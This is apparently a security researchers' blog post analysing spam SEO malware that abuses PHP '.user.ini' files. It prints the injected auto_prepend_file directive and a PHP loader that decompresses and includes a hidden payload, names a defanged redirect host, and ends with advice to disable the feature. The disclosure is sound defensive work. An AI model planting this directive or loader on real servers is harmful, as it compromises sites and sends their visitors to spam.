Since PHP 5.3.0, PHP includes support for configuration INI files on a per-directory basis that has the same effect (depending on the case) that the .htaccess files have on Apache. With that in mind, attackers are exploiting this feature to manipulate the search engine results in order to benefit malicious websites and redirect users to arbitrary spam content.
The payload is based on specific directives being injected into “.user.ini”; hence it’s executed before the site is rendered. On Spam SEO redirects that use “.htaccess” rules only, the payload result is visible in the browser and not the malicious code itself. However, in this particular case, we were able to detect the malicious code.
Following, are the directives injected into “.user.ini”:
; Directive 1...auto_prepend_file = '/tmp/.tmp/wrtZaCDz2'; END Directive 1
This type of .ini files doesn’t override all php.ini settings, however it allows attackers to use the auto_prepend directive, which will load a file that is parsed before the main php file. This file is included by the require function. In this case auto_prepend_file was loading “/tmp/.tmp/wrtZaCDz2”, which contained the following code:
<?php$mysqli_class = '/tmp/.tmp/wrtLaCDz7';$mysqli_init = file_get_contents($mysqli_class);$streams_cache = tmpfile();fwrite($streams_cache, gzuncompress($mysqli_init));$stream_id = stream_get_meta_data($streams_cache);include $stream_id['uri'];
After “gzuncompress()’ing” the content of the file “/tmp/.tmp/wrtLaCDz7”, we get a malware that implements evasive techniques against different search engines, and assembles redirect links from the malicious website (hxxp://search-tracker[dot]com/in.cgi?7¶meter=$keyword&se=$se&ur=1).
This infection was found on servers running nginx, but as long as the ability to use .user.ini files is enabled, there’s a chance attackers may use it to take advantage of your resources. If you are not using the feature, we highly recommend disabling it to prevent any issues.
Denis Sinegubko
Fernando Barbosa
Luke Leal
David Dede